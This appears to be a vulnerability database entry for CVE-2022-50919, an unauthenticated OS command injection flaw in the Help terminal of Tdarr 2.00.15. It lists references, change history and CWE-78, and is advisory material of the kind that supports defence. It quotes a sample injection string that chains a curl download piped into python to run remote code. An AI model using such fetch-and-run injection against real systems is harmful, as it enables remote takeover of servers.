Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
References
| Link | Resource |
|---|---|
| https://tdarr.io | Product |
| https://www.exploit-db.com/exploits/50822 | Exploit Third Party Advisory |
| https://www.vulncheck.com/advisories/tdarr-command-injection | Third Party Advisory |
Configurations
History
29 Jan 2026, 18:54
| Type | Values Removed | Values Added |
|---|---|---|
| First Time |
Tdarr
Tdarr tdarr |
|
| CPE | cpe:2.3:a:tdarr:tdarr:2.00.15:*:*:*:*:*:*:* | |
| References | () https://tdarr.io - Product | |
| References | () https://www.exploit-db.com/exploits/50822 - Exploit, Third Party Advisory | |
| References | () https://www.vulncheck.com/advisories/tdarr-command-injection - Third Party Advisory |
13 Jan 2026, 23:15
| Type | Values Removed | Values Added |
|---|---|---|
| New CVE |
Information
Published : 2026-01-13 23:15
Updated : 2026-01-29 18:54
NVD link : CVE-2022-50919
Mitre link : CVE-2022-50919
CVE.ORG link : CVE-2022-50919
JSON object : View
Products Affected
tdarr
- tdarr
CWE
CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
